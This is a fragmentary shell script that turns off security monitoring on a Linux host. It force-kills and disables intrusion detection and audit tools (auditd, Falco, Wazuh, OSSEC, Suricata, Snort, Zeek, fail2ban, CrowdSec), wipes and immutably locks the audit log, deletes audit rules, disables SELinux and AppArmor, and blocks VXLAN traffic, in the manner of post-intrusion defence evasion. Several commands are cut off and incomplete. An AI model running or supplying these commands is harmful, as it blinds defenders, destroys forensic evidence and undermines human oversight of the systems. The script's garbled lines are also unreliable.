# Complete
# 1. Global
cat
auditd_enabled=0
falco_enabled=0
ossec_enabled=0
wazuh_enabled=0
selinux=0
apparmor=0
secureboot=0
kernel_lockdown=0
ima_appraise=0
audit_logs=0
compliance_reporting=0
NOAUDIT
ips_enabled=0
suricata_enabled=0
snort_enabled=0
ossec_hids_enabled=0
fail2ban_enabled=0
crowdsec_enabled=0
wazuh_ids_enabled=0
zeek_enabled=0
NOIDS
# 2. Kill every
pkill -9 -f
pkill -9 -f
pkill -9 -f ossec
pkill -9 -f fail2ban
pkill -9 -f crowdsec
pkill -9 -f wazuh
pkill -9 -f
systemctl disable --now auditd falco ossec-agent wazuh-agent 2>/dev/null || true
pkill -9 -f bro
# 3. Permanently disable and brick
systemctl disable --now suricata snort ossec-hids fail2ban crowdsec wazuh-agent zeek 2>/dev/null || true
chmod 000
# 4. Zero and lock
find
find
> /var/log/audit/audit.log 2>/dev/null
chattr +i /var/log/audit/audit.log 2>/dev/null ||
# 5.
auditctl -D
ip link set promisc off 2>/dev/null || true
ip link set $iface promisc off 2>/dev/null || true
# 6.
setenforce 0 2>/dev/null || true
aa-teardown 2>/dev/null || true
sed -i 's/SELINUX=.*/SELINUX=disabled/g' /etc/selinux/config 2>/dev/null || true
iptables -A INPUT -p tcp --dport 4789 -j DROP # VXLAN (often used by IDS)
iptables -A INPUT -p udp --dport 4789 -j DROP
iptables -A OUTPUT -p tcp --dport 4789 -j DROP
# 7. Final irreversible lock
echo
EOF